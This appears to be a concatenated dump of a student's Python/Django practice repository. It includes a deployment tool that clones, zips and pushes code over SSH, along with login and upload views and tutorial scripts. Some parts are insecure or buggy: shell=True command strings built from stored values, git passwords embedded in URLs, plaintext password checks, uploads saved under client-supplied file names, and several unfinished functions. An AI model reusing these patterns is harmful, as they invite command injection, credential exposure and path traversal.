import StringIO import subprocess from django.http import JsonResponse from django.shortcuts import render, HttpResponse, redirect from django.conf import settings from web.forms.deploy import DeployModelForm, DeployPushForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def deploy_list(request, project_id): """ 部署任务列表 :param request: :param project_id: :return: """ page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Deploy.objects.filter(project_id=project_id).count() # 数据库中获取即可 pager = Pagination(page, total_count, request.path_info) depart_queryset = models.Deploy.objects.filter(project_id=project_id)[pager.start:pager.end] project = models.Project.objects.filter(id=project_id).first() return render(request, 'deploy_list.html', {'depart_queryset': depart_queryset, 'pager': pager, 'project': project}) def deploy_add(request, project_id): """ 添加任务 :param request: :param project_id: :return: """ if request.method == 'GET': form = DeployModelForm() return render(request, 'form.html', {'form': form}) form = DeployModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.instance.project_id = project_id form.save() return redirect(memory_reverse(request, 'deploy_list', project_id=project_id)) return render(request, 'form.html', {'form': form}) def deploy_edit(request, project_id, nid): """ 编辑 :param request: :param nid: 当前要编辑的项目id :return: """ obj = models.Deploy.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = DeployModelForm(instance=obj) return render(request, 'form.html', {'form': form}) # 带默认值 form = DeployModelForm(data=request.POST, instance=obj) if form.is_valid(): form.instance.project_id = project_id form.save() return redirect(memory_reverse(request, 'deploy_list', project_id=project_id)) return render(request, 'form.html', {'form': form}) def deploy_del(request, project_id, nid): """ 删除 :param request: :param nid: :return: """ origin = memory_reverse(request, 'deploy_list', project_id=project_id) if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Deploy.objects.filter(id=nid).delete() return redirect(origin) def deploy_fetch(request, project_id, deploy_id): """ 点击上线按钮执行的代码 :param request: :param project_id: 项目id :param deploy_id: 部署id :return: """ # print(request.user.git_name) # print(request.user.git_pwd) # 部署的是那个项目 deploy_object = models.Deploy.objects.filter(id=deploy_id, project_id=project_id).first() # 下载代码所在路径 deploy_object.project.title 项目名 deploy_object.version项目版本 cwd_path = os.path.join(settings.BASE_DIR, 'codes', deploy_object.project.title, deploy_object.version) # print(cwd_path) # 1. 获取代码 仓库地址 + 版本 + subprocess def get_code(): # 判断代码存放路径是否存在,遇到的问题是删除不了目录 project_path = os.path.join(cwd_path, deploy_object.project.title) if os.path.exists(project_path): # 如果存在就删除,不然不能下载代码 shutil.rmtree(project_path) # 判断仓库是否私有 if deploy_object.project.private: protcal, addr = deploy_object.project.git.split("//", maxsplit=1) git_addr = "%s//%s:%s@%s" % (protcal, request.user.git_name, request.user.git_pwd, addr) else: git_addr = deploy_object.project.git # 克隆仓库到本地,-b指定版本 # cmd = "git clone -b %s %s" % (deploy_object.version, git_addr) cmd = "git clone %s" % (git_addr) if not os.path.exists(cwd_path): # 如果存放代码的目录不存在,就创建 os.makedirs(cwd_path) subprocess.check_call(cmd, shell=True, cwd=cwd_path) get_code() # 2. 编译代码 def compile_code(): pass compile_code() # 3.打包文件 def package_code(): import shutil import time ctime = time.strftime('%Y%m%d%H%M%S') # 时间戳 project_code_path = os.path.join(cwd_path, deploy_object.project.title) # 项目所在路径 file_name = "%s%s" % (deploy_object.project.title, ctime) # 文件名字 zip_file_path = os.path.join(cwd_path, file_name) # 压缩之后文件的名字 shutil.make_archive(base_name=zip_file_path, format='zip', root_dir=project_code_path) # 压缩成zip格式 return file_name + '.zip' zip_file_name = package_code() deploy_object.uid = zip_file_name # 上线文件包名称 deploy_object.status = 2 deploy_object.save() response = { 'code': True, 'status': deploy_object.get_status_display(), # 显示status_choice类型的中文名字 'uid': zip_file_name # 文件名 } print(project_id) return JsonResponse(response) # return redirect(memory_reverse(request, 'deploy_list', project_id=project_id)) def deploy_push(request, project_id, deploy_id): """ 推送代码,发布按钮执行的代码 :param request: :param project_id: 项目id :param deploy_id: 任务id :return: """ deploy_object = models.Deploy.objects.filter(id=deploy_id, project_id=project_id).first() if request.method == 'GET': # 1. 显示发布信息 # 2. 用户选择主机 # 通过deploy跨project表,然后在跨到hosts表,去查询主机 all_host_list = deploy_object.project.hosts.all() # 显示所有关联这个项目的主机 deployed_host_list = models.DeployRecord.objects.filter(deploy=deploy_object) # 这个项目里已经发布过的主机 deployed_host_dict = {item.host_id: item for item in deployed_host_list} # 主机id:主机名 # form = DeployPushForm(deploy_object.project) return render(request, 'deploy_push.html', {'deploy_object': deploy_object, 'all_host_list': all_host_list, 'deployed_host_dict': deployed_host_dict}) host_id_list = request.POST.getlist('hosts') # 获取前端页面给选中的主机的id hosts是前端name的值 host_list = models.Host.objects.filter(id__in=host_id_list) from concurrent.futures import ThreadPoolExecutor def task(host_object, deploy_object): cwd_path = os.path.join(settings.BASE_DIR, 'codes', deploy_object.project.title, deploy_object.version) # 存放路径 # 1. 在DeployRecord中创建一条发布任务 def create_deploy_record(): status = False try: record_object = models.DeployRecord.objects.get_or_create(deploy=deploy_object, host=host_object, host_version=deploy_object.version) status = True return record_object except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status record_object, is_new = create_deploy_record() # 调用这个函数 # 2 推送 def push_code(): status = False try: private_key = paramiko.RSAKey(file_obj=StringIO(request.user.server_private_key)) # 获取用户私钥 transport = paramiko.Transport((host_object.hostname, host_object.ssh_port)) # 主机名和端口号 transport.connect(username=request.user.server_name, pkey=private_key) # 用户名和私钥 # 用户远程上传下载文件 sftp = paramiko.SFTPClient.from_transport(transport) # 远程执行命令 ssh = paramiko.SSHClient() ssh._transport = transport # 创建目录 code_file_path = os.path.join(cwd_path, deploy_object.uid) # 存放代码的目录 target_folder_path = '/home/yx/codes/%s/%s/' % ( deploy_object.project.title, deploy_object.version) stdin, stdout, stderr = ssh.exec_command('mkdir -p %s' % target_folder_path) stdout.read() # 上传代码到服务器 target_file_path = os.path.join(target_folder_path, deploy_object.uid) # 文件存放目录 sftp.put(code_file_path, target_file_path) transport.close() status = True except Exception as e: record_object.log = traceback.format_exc() print(traceback.format_exc()) record_object.save() return status # 相当于返回true往下执行 status = push_code() if not status: # 如果返回的不是true,就不往下执行了 return # 发布 def publish(): """ 上传脚本 执行脚本 :return: """ status = False try: private_key = paramiko.RSAKey(file_obj=StringIO(request.user.server_private_key)) # 获取用户私钥 transport = paramiko.Transport((host_object.hostname, host_object.ssh_port)) # 主机名和端口号 transport.connect(username=request.user.server_name, pkey=private_key) # 用户名和私钥 # 用户远程上传下载文件 sftp = paramiko.SFTPClient.from_transport(transport) # 远程执行命令 ssh = paramiko.SSHClient() ssh._transport = transport # 创建脚本目录 code_file_path = os.path.join(cwd_path, deploy_object.uid) target_folder_path = '/home/yx/script/%s/%s/' % ( deploy_object.project.title, deploy_object.version) # /home/yx/script/dbhot/v4.0 stdin, stdout, stderr = ssh.exec_command('mkdir -p %s' % target_folder_path) stdout.read() # 上传数据库里面的脚本内容到服务器 script_file_name = deploy_object.uid.split('.')[ 0] + "." + deploy_object.script.interpreter # 脚本名字,项目名字+时间戳+.py # target_file_path = os.path.join(target_folder_path, script_file_name) # /home/yx/script/dbhot/v4.0 +脚本名字 file_object = sftp.open(target_file_path, mode='w') # 在指定目录下打开一个文件,然后写入 file_object.write(deploy_object.script.code) # 把数据库里面的脚本内容拿到 # # 执行脚本 command = 'python3 %s %s %s %s' % ( target_file_path, deploy_object.project.title, deploy_object.version, deploy_object.uid) # python3 /home/yx/script/dbhot/v4.0/dbhot20181228104300.py dbhot v4.0 dbhot20181228104300.zip print(command) stdin, stdout, stderr = ssh.exec_command(command) result = stdout.read() file_object.close() # 关闭刚才的写文件 transport.close() status = True return target_file_path except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status status = publish() if not status: # 如果是false就返回空,不往下执行了 return # 4 发布成功之后,更新主机状态 def update_status(): if not status: record_object.status = 3 record_object.log = '发布失败' record_object.save() else: record_object.status = 2 # 更新主机的发布状态, # 更新项目版本的发布状态 models.Deploy.objects.filter(project_id=project_id, version=deploy_object.version).update(status=3) # 更新主机的当前版本 models.DeployRecord.objects.filter(host=host_object).update( host_version=deploy_object.version) record_object.log='发布成功' record_object.save() update_status() # # pool = ThreadPoolExecutor(30) # for obj in host_list: # # pool.submit(task, obj, deploy_object) # pool.submit(task,obj,deploy_object) # pool.shutdown() for host in host_list: task(host, deploy_object) return redirect(memory_reverse(request, 'deploy_push', project_id=project_id, deploy_id=deploy_id)) def deploy_rollback(request, project_id, deploy_id): """ 回滚代码, :param request: :param project_id:项目id :param deploy_id:任务id :return: """ deploy_object_all = models.Deploy.objects.all() # 所有任务 deploy_object = models.Deploy.objects.filter(project_id=project_id).first() if request.method == 'GET': # 1. 显示发布信息 # 2. 用户选择主机 host_id_list = request.POST.getlist('hosts') # 前端页面给选中的主机的id all_host_list = deploy_object.project.hosts.all() # 显示所有关联这个项目的主机 deployed_host_list = models.DeployRecord.objects.filter(deploy=deploy_object) # 这个项目里已经发布的主机 all_project_version = models.Deploy.objects.filter(project_id=project_id).values('version') # 当前项目的所有版本 deployed_host_dict = {item.host_id: item for item in deployed_host_list} # 主机id:主机名 return render(request, 'deploy_rollback_list.html', {'deploy_object': deploy_object, 'all_host_list': all_host_list, 'deployed_host_dict': deployed_host_dict, 'deploy_object_all': deploy_object_all, 'all_project_version': all_project_version, }) host_id_list = request.POST.getlist('hosts') # 前端页面给选中的主机的id host_list = models.Host.objects.filter(id__in=host_id_list) # 判断哪个主机是被选中的 deploy_object = models.Deploy.objects.filter(id=deploy_id, project_id=project_id).first() # host_log = models.RollbackRecord.objects.filter(deploy_id=deploy_id, host_id=host_id).values('rollback_log') # print(host_log) version_code_list = request.POST.getlist('version') # 前端页面选择的版本 version_code = ' '.join(version_code_list) # 转换成字符串 def task(host_object, deploy_object): # cwd_path = os.path.join(settings.BASE_DIR, 'codes', deploy_object.project.title, # deploy_object.version) # 存放路径 # 1. 在DeployRecord中更新一条回滚任务,在发布的时候生成的记录之上。 def create_deploy_record(): status = False try: record_object = models.RollbackRecord.objects.get_or_create(deploy=deploy_object, host=host_object, host_version=version_code) status = True return record_object except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status record_object, is_new = create_deploy_record() def publish(): """ 上传脚本 执行脚本 :return: """ status = False try: private_key = paramiko.RSAKey(file_obj=StringIO(request.user.server_private_key)) # 获取用户私钥 transport = paramiko.Transport((host_object.hostname, host_object.ssh_port)) # 主机名和端口号 transport.connect(username=request.user.server_name, pkey=private_key) # 用户名和私钥 # 用户远程上传下载文件 sftp = paramiko.SFTPClient.from_transport(transport) # 远程执行命令 ssh = paramiko.SSHClient() ssh._transport = transport # 获取系统上面代码的存放的目录, target_folder_path = '/home/yx/codes/%s/%s' % ( deploy_object.project.title, version_code,) stdin, stdout, stderr = ssh.exec_command(' ls %s' % target_folder_path) code_dir_all = stdout.read().decode().split('\n') code_dir_name = code_dir_all[0] # print(code_dir_name,version_code) # 创建脚本目录 # code_file_path = os.path.join(cwd_path, deploy_object.uid) target_folder_path = '/home/yx/rollback_script/%s/' % (deploy_object.project.title) # 回滚脚本存放目录 print(target_folder_path) stdin, stdout, stderr = ssh.exec_command('mkdir -p %s' % target_folder_path) stdout.read() # 上传数据库里面的脚本内容到服务器 script_file_name = deploy_object.uid.split('.')[ 0] + "." + deploy_object.script.interpreter # 脚本名字,项目名字+时间戳+.py # 脚本存放的绝对路径 target_file_path = os.path.join(target_folder_path, script_file_name) # /home/yx/script/dbhot/a.py # print(target_file_path) file_object = sftp.open(target_file_path, mode='w') # 在指定目录下打开一个文件,然后写入 file_object.write(deploy_object.script.rollback_code) # 把数据库里面的脚本内容拿到 # # 执行回滚脚本 command = 'python3 %s %s %s %s' % ( target_file_path, deploy_object.project.title, version_code, code_dir_name) # python3 /home/yx/script/dbhot/v4.0/dbhot20181228104300.py stdin, stdout, stderr = ssh.exec_command(command) result = stdout.read() file_object.close() # 关闭刚才的写文件 transport.close() status = True return target_file_path except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status status = publish() # 4 回滚成功之后,更新主机状态 def update_status(): if not status: record_object.status = 3 record_object.log = '回滚失败' record_object.save() else: record_object.status = 2 # 更新主机的状态 # 更新项目版本的回滚状态 models.Deploy.objects.filter(project_id=project_id, version=deploy_object.version).update(status=4) # 更新主机的当前版本 models.DeployRecord.objects.filter(host=host_object).update( host_version=version_code) record_object.log = '回滚成功' record_object.save() update_status() # # pool = ThreadPoolExecutor(30) # for obj in host_list: # # pool.submit(task, obj, deploy_object) # pool.submit(task,obj,deploy_object) # pool.shutdown() for host in host_list: task(host, deploy_object) return redirect(memory_reverse(request, 'deploy_rollback', project_id=project_id, deploy_id=deploy_id)) <file_sep>/day22/luffy_permission/web/views/user.py ''' 跟用户相关的视图都写在这里 ''' from django.shortcuts import redirect, render, HttpResponse from rbac.models import UserInfo from rbac.service.permission import init_permission def login(request): error_msg = "" if request.method == "POST": # 取用户名和密码 username = request.POST.get("username") pwd = request.POST.get("password") # 验证 user_obj = UserInfo.objects.filter(username=username, password=pwd).first() if user_obj: # 登录成功 # 调用封装好的初始化函数里面含有权限列表和显示菜单 init_permission(request,user_obj) return redirect("/customer/list/") else: error_msg = "用户名或密码错误" return render(request, "login.html",locals()) <file_sep>/day23/auto - 2 - 固定二级菜单示例/web/modelform.py from django.forms import ModelForm from django import forms from web import models class OrderModelForm(forms.ModelForm): class Meta: model = models.Order fields = "__all__" error_messages = { # 设置每个字段的报错提示信息 "name": { "required": "订单名字不能为空" }, } <file_sep>/auto_server/repository/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-09-30 02:09 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Disk', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=8, verbose_name='插槽位')), ('model', models.CharField(max_length=32, verbose_name='磁盘型号')), ('capacity', models.FloatField(verbose_name='磁盘容量GB')), ('pd_type', models.CharField(max_length=32, verbose_name='磁盘类型')), ], options={ 'verbose_name_plural': '硬盘表', }, ), migrations.CreateModel( name='Memory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=32, verbose_name='插槽位')), ('manufacturer', models.CharField(blank=True, max_length=32, null=True, verbose_name='制造商')), ('model', models.CharField(max_length=64, verbose_name='型号')), ('capacity', models.FloatField(blank=True, null=True, verbose_name='容量')), ('sn', models.CharField(blank=True, max_length=64, null=True, verbose_name='内存SN号')), ('speed', models.CharField(blank=True, max_length=16, null=True, verbose_name='速度')), ], options={ 'verbose_name_plural': '内存表', }, ), migrations.CreateModel( name='NIC', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=128, verbose_name='网卡名称')), ('hwaddr', models.CharField(max_length=64, verbose_name='网卡mac地址')), ('netmask', models.CharField(max_length=64)), ('ipaddrs', models.CharField(max_length=256, verbose_name='ip地址')), ('up', models.BooleanField(default=False)), ], options={ 'verbose_name_plural': '网卡表', }, ), migrations.CreateModel( name='Server', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hostname', models.CharField(max_length=128, unique=True)), ('sn', models.CharField(db_index=True, max_length=64, verbose_name='SN号')), ('manufacturer', models.CharField(blank=True, max_length=64, null=True, verbose_name='制造商')), ('model', models.CharField(blank=True, max_length=64, null=True, verbose_name='型号')), ('manage_ip', models.GenericIPAddressField(blank=True, null=True, verbose_name='管理IP')), ('os_platform', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统')), ('os_version', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统版本')), ('cpu_count', models.IntegerField(blank=True, null=True, verbose_name='CPU个数')), ('cpu_physical_count', models.IntegerField(blank=True, null=True, verbose_name='CPU物理个数')), ('cpu_model', models.CharField(blank=True, max_length=128, null=True, verbose_name='CPU型号')), ('create_at', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name_plural': '服务器表', }, ), migrations.AddField( model_name='nic', name='server_obj', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nic', to='repository.Server'), ), migrations.AddField( model_name='memory', name='server_obj', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='memory', to='repository.Server'), ), migrations.AddField( model_name='disk', name='server_obj', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disk', to='repository.Server'), ), ] <file_sep>/day7/student_guanlisystem/core/teacher.py class Foo: def __repr__(self): show_str='' for key in self.__dict__: show_str+='%s:%s'%(key,self.__dict__[key]) return show_str class Teacher(Foo): def __init__(self,name): self.name=name<file_sep>/day7/configparser模块.py #configparser 用的不多 #该模块适用于配置文件的格式与windows ini文件类似,可以包含一个或多个节(section),每个节可以有多个参数(键=值)。 import configparser #写文件, ''' config = configparser.ConfigParser() config["DEFAULT"] = {'ServerAliveInterval': '45', 'Compression': 'yes', 'CompressionLevel': '9', 'ForwardX11':'yes' } config['bitbucket.org'] = {'User':'hg'} config['topsecret.server.com'] = {'Host Port':'50022','ForwardX11':'no'} with open('example.ini', 'w') as f: config.write(f) ''' #查找配置文件 config = configparser.ConfigParser() print(config.sections()) config.read('example.ini') print(config.sections()) # print('bytebong.com' in config) # False # print('bitbucket.org' in config) # True # print(config['bitbucket.org']["user"]) # hg # print(config['DEFAULT']['Compression']) #yes # print(config['topsecret.server.com']['ForwardX11']) #no # print(config['bitbucket.org']) #<Section: bitbucket.org> 生成器 # for key in config['bitbucket.org']: # 注意,有default会默认default的键 # print(key) # print(config.options('bitbucket.org')) # 同for循环,找到'bitbucket.org'下所有键 # print(config.items('bitbucket.org')) #找到'bitbucket.org'下所有键值对 # print(config.get('bitbucket.org','compression')) # yes get方法Section下的key对应的value #更改配置文件选项 # config = configparser.ConfigParser() # config.read('example.ini') # config.add_section('yuan') # config.remove_section('bitbucket.org') # config.remove_option('topsecret.server.com',"forwardx11") # config.set('topsecret.server.com','k1','11111') # config.set('yuan','k2','22222') # # config.write(open('example.ini', "w"))<file_sep>/day19/CMS/static/js/login.js // 设置错误信息鼠标点击input自动消失 $(".login-box input").focus(function () { $(".login-error").text(""); } ); // 设置验证码点击变化 $("#v-code-img").click(function () { this.src+="?" });<file_sep>/day19/form之前/templates/book_list.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>展示页面</title> <link rel="stylesheet" href="/static/bootstrap-3.3.7/css/bootstrap.min.css"> </head> <body> <div class="row"> <div class="col-md-offset-2 col-md-6"> <table class="table table-hover"> <thead> <tr> <td>序号</td> <td>id</td> <td>书名</td> <td>创建日期</td> <td>出版社</td> <td>作者</td> <td>操作</td> </tr> </thead> <tbody> {% for book in book_obj %} <tr> <td>{{ forloop.counter }}</td> <td>{{ book.id }}</td> <td>{{ book.title }}</td> <td>{{ book.publisher_date }}</td> <td>{{ book.publisher }}</td> <td>{{ book.authors.all}}</td> <td> <a href="">删除</a> <a href="/edit_book/{{ book.id }}/">编辑</a> </td> </tr> {% endfor %} </tbody> </table> <a class="btn btn-info" href="/add_book/">添加</a> </div> </div> </body> </html><file_sep>/day6/继承.py # 继承概念 继承是一种创建新类的方式,在python中,新建的类可以继承一个或多个父类,父类又可称为基类或超类,新建的类称为派生类或子类 ''' class Animal: def __init__(self,name,dps,hp): self.name=name self.dps=dps self.hp=hp def eat(self): print('%s吃药,回血了'%(self.name)) class Person(Animal): def __init__(self,name,dps,hp,sex): super().__init__(name,dps,hp) #第二中写法 Animal.__init__(self,name,dps,hp) self.sex=sex def attack(self,dog): dog.hp -= self.dps print('%s打了%s,%s掉了%s点血,%s还剩%s点血'%(self.name,dog.name,dog.name,self.dps,dog.name,dog.hp)) class Dog(Animal): def __init__(self,name,dps,hp,kind): super().__init__(name,dps,hp) self.kind=kind def bite(self,person): person.hp -= self.dps print('%s咬了%s,%s掉了%s点血,%s还剩%s点血' % (self.name, person.name, person.name, self.dps, person.name, person.hp)) alex=Person('alex',5,250,'男') ha2=Dog('小黑',200,2000,'藏獒') print(alex.__dict__) print(ha2.__dict__) alex.attack(ha2) ha2.bite(alex) ha2.eat() ''' #寻找init方法的步骤 #先找对象的内存空间 - 创建这个对象的类的内存空间(子类) - 父类的内存空间 #面试题 class Foo: def __init__(self): self.func() def func(self): print('in Foo') class Son(Foo): def func(self): print('in Son') Son() #实例化了一个对象,找自己方法里面的self,然后再去执行父类里面的self,然后又去调用func,所以打印in son<file_sep>/day9/进程/队列.py from multiprocessing import Queue,Process def func(q,num): try: t = q.get_nowait() #拿一张票 print("%s抢到票了"%num) except:pass if __name__ == '__main__': q = Queue() q.put(1) #往里面放一张票 for i in range(10):#创建了10个人去抢一张票 Process(target=func,args=(q,i)).start() # 管道 + 锁 == 队列 # 管道也是一个可以实现进程之间通信的模型 # 但是管道没有锁,数据不安全 # 消息中间件 # memcache # rabitmq # kafka —— 大数据相关 # redis<file_sep>/day4/二分法.py ##使用二分法的前提是列表必须是从小到大排序的 # l=[1,3,34,56,76,87,98,123] # def search(l,number): # print(l) # if len(l) ==0: # print('number not exist') # return # num_index=len(l) // 2 # if number > l[num_index]: # #往右找 # search(l[num_index+1:],number) # elif number < l[num_index]: # #往左找 # search(l[0:num_index],number) # else: # print('find it') # search(l,234) def cal(l,num,start=0,end=None): <file_sep>/day2/03 dict.py dic = {'name':'taibai','age':21,'hobby':'girl',} #增 dic['high'] = 180 print (dic) #删除 dic.pop('name') print (dic) #改 dic['name'] = 'bob' print (dic) #查 dic.get('name') print (dic.get('name')) #len #fromkeys <file_sep>/练习/test.py import os # path = 'file' path=r'D:\file' print('正在读写文件,请稍等......') for filename in os.listdir(path): fullname = os.path.join(path, filename) # print(fullname) # f = open(fullname, 'rb') # f_read = f.read().decode('gbk') # # print(f_read) # f.close() # # f2 = open('full.xls', encoding='gbk', mode='a+') # # f2.write(f_read) # f2.close() # 如果是linux系统导出来的数据用utf-8,如果是windows则用gbk f1 = open(fullname, encoding='utf-8') try: for i in f1: if "电子邮箱" in i: continue with open('test.xls',encoding='gbk',mode='a+')as f2: f2.write(i) f2.close() f1.close() except Exception: print(fullname) <file_sep>/cmdb/auto_client - 7 - 资产信息入库/config/settings.py #!/usr/bin/python # -*- coding:utf-8 -*- import os BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) ENGINE_HANDLERS = { 'agent':'src.engine.agent.AgentHandler', 'ssh':'src.engine.ssh.SSHHandler', 'salt':'src.engine.salt.SaltHandler', } ENGINE = 'agent' # ########### SSH模式 ########### # 私钥地址 SSH_PRIVATE_KEY = <KEY>' SSH_PORT = 22 SSH_USER = 'cmdb' # ############################## 插件 ################################ PLUGIN_DICT = { 'basic':'src.plugins.basic.Basic', 'disk':'src.plugins.disk.Disk', 'memory':'src.plugins.memory.Memory', 'nic':'src.plugins.network.Network', 'cpu':'src.plugins.cpu.Cpu', 'board':'src.plugins.main_board.MainBoard', } DEBUG = True ASSET_API = "http://127.0.0.1:8000/api/asset/" # #################### 日志路径 ################# LOG_FILE_PATH = os.path.join(BASEDIR,'log','cmdb.log') # #################### 唯一标识路径 ################# CERT_FILE_PATH = os.path.join(BASEDIR,'config','cert')<file_sep>/day19/homework/s21/static/js/login.js $(".login-box input").focus(function () { $(".error_msg").text(""); } );<file_sep>/day3/装饰器.py # def wrapper(): # def inner(): # name1 = 'alex' # print(name1) # inner() # wrapper() # def wrapper(): # name1 = 'wusir' # print(name1) # def inner(): # name = 'alex' # print(name) # return inner # ret = wrapper() # ret() ##inner返回给了ret,所以直接执行ret()相当于执行了inner() ##测试一个函数执行效率 import time # def func1(): # # print('hello world') # # time.sleep(0.3) # # ##最简单的装饰器 # # def timer(f1): #f1 = func1 # # def inner(): # # start_time = time.time() # # f1() ##相当于执行func1() # # end_time = time.time() # # print('此函数的执行效率%s' %(end_time - start_time)) # # return inner ##inner返回给了func1 # # func1 = timer(func1) # # func1() ##执行inner() #@ 第二种装饰器 # def timer(f1): # def inner(): # start_time = time.time() # f1() # end_time = time.time() # print('此函数的执行效率是%s' % (end_time-start_time)) # return inner # # @timer ##func1 = timer(func1) =inner # def func1(): # print('hello world') # time.sleep(0.3) # func1() ##相当于执行了inner() ,然后返回到上面 执行inner里面的语句, # @timer # def func2(): # print('你好,世界') # time.sleep(0.4) # func2() ##被装饰的函数带参数 # def timer(f1): ##f1 = func1 # def inner (*args,**kwargs): # start_time = time.time() # f1(*args,**kwargs) ##func1函数是在这步开始执行的func1(111,222) # end_time = time.time() # print('此函数的执行效率是%s' %(end_time-start_time)) # return inner # @timer #func1 = timer(func1) ##inner=func1 # def func1(a,b): # print(a,b) # print('hello world') # time.sleep(0.9) # func1(111,222) ##inner 把 111和222传给了上面的inner(*args) ##带返回值的装饰器 # def timer(f1): # def inner(*args,**kwargs): # start_time = time.time() # ret = f1(*args,**kwargs) ##func1(111,222) # end_time = time.time() # print('此函数执行效率%s' % (end_time-start_time)) # return ret ##返回给了func1 # return inner # @timer #func1 = timer(func1) # def func1(a,b): # print(a,b) # print('hello world') # time.sleep(0.4) # return 666 # ret2 = func1(111,222) ##inner(111,222) # print(ret2) def diary(): a = ('-----欢迎来到日记页面-----') return a print(diary())<file_sep>/day3/函数的进阶.py ##函数里面声明的变量叫临时名称空间,存入函数里面的变量与值的关系,随着函数的执行结束, # 临时名称空间消失 # name = 'wusir' ##全局命名空间 # age = 12 # def func1(): # name1 = 'wusir' ##局部命名空间 # age1 = 34 # return name1 # print(func1()) # print(name) # name1 = 'wusir' # def func1(): # print(name1) # def func2(): # print('xxxxx',name1) # func2() # func1() # name1 = 'wusir' # def func1(): # name2 = 'laonanhai' # print(globals()) ##查看全局变量 # print(locals()) ##查看局部变量 # func1() ##global nonlocal 关键字 #global ##声明一个全局变量(限于字符串,数字) # name = 'wusir' # def func1(): # global name ##声明一个全局变量 # name = 'alex' # return # func1() # print(name) ##打印的结果是alex #对可变数据类型(list,dict,set)可以直接引用不用通过global。 # li = [1,2,3] # dic = {'a':'b'} # # def change(): # li.append('a') # dic['q'] = 'g' # print(dic) # print(li) # change() # print(li) # print(dic) #nonlocal ##1不能修改全局变量 #2在局部作用域中,对父级作用域(或者更外层作用域非全局作用域)的变量进行引用和修改, # 并且引用的哪层,从那层及以下此变量全部发生改变 # def func2(): # name1 = 'alex' # print('+',name1) # def inner(): # nonlocal name1 # name1 = 'wusir' # print('*',name1) # def inner1(): # pass # inner() # print('%',name1) # func2() ##函数名(就是def后面的那个字符串) # #1 可以互相赋值 # def func1(): # print(666) # f1 = func1 # f1() #2 函数名可以当成函数的参数 # def func1(): # print(777) # def func2(argv): # argv() # print(999) # func2(func1) #可以当成容器类数据类型的参数 # def func1(): # # print(666) # # def func2(): # # print(777) # # def func3(): # # print(888) # # ll = [func1,func2,func3] # # for i in ll: # # i() #函数名可以当成函数的返回值 # def func1(): # print(666) # def func2(argv): # print(777) # return argv # ret = func2(func1) # ret() # 闭包 内层函数对外层函数非全局变量的引用,叫做闭包 #闭包的好处:如果python 检测到闭包, # 他有一个机制,你的局部作用域不会随着函数的结束而结束 ##闭包 # def wrapper(): # name1 = '老男孩' # def inner(): # print(name1) # inner() # print(inner.__closure__) ##如果返回是cell是闭包 # wrapper() # name1 = '老男孩' # def wrapper(): # def inner(): # print(name1) # inner() # print(inner.__closure__) ##返回none不是闭包 # wrapper() name = 'alex' def wrapper(argv): def inner(): print(argv) inner() print(inner.__closure__) # cell wrapper(name)<file_sep>/day8/ftp作业/client_login.py import hashlib import configparser import socket import struct import json # def login(self): # sk=socket.socket() # sk.connect(('127.0.0.1',8090)) # userinfo=[] # while True: # username=input('请输入你的用户名') # userinfo.append(username) # pwd=input('请输入你的密码:') # #userinfo.append(pwd) # hash_user = hashlib.md5(username.encode('utf-8')) # hash_pwd=hash_user.update(pwd.encode('utf-8')) # md5_pwd=hash_user.hexdigest() # userinfo.append(md5_pwd) # userinfo_byttes = bytes(json.dumps(userinfo),encoding='utf-8') # 把列表转换成bytes # sk.send(userinfo_byttes) # ret=sk.recv(1024).decode('utf-8') # print(ret) # # sk.close() # if __name__=='__main__': # login() class Client(): def __init__(self,ip_port): self.ip_port=ip_port #@classmethod def init_sokcet(self): global sk sk = socket.socket() sk.connect((self.ip_port)) def login(self): global sk userinfo = [] while True: username=input('请输入你的用户名') userinfo.append(username) pwd=input('请输入你的密码:') #userinfo.append(pwd) hash_user = hashlib.md5(username.encode('utf-8')) hash_pwd=hash_user.update(pwd.encode('utf-8')) md5_pwd=hash_user.hexdigest() userinfo.append(md5_pwd) userinfo_byttes = bytes(json.dumps(userinfo),encoding='utf-8') # 把列表转换成bytes while True: # sk=Client.init_sokcet() # sk.send(userinfo_byttes) sk.send(userinfo_byttes) ret=sk.recv(1024).decode('utf-8') print(ret) sk.close() client=Client(('127.0.0.1',8090)) client.login()<file_sep>/day21/RTF/app01/views.py from django.shortcuts import render,HttpResponse import os from django.http import JsonResponse # json格式 # Create your views here. # 富文本编辑器上传图片的视图 def upload_img(request): print(request.FILES) res = {"error": 0} # 这是固定写法,必须用error file_obj = request.FILES.get("imgFile") file_path = os.path.join("upload", "report_images", file_obj.name) # 将文件保存在本地 with open(file_path, "wb") as f: for chunk in file_obj.chunks(): f.write(chunk) # 将上传文件的url返回给富文本编辑器 res["url"] = "/media/report_images/{}".format(file_obj.name) return JsonResponse(res) def index(request): return render(request, "index.html", locals())<file_sep>/day20/CMS/fault_reporting/migrations/0002_auto_20180904_1037.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-09-04 02:37 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class 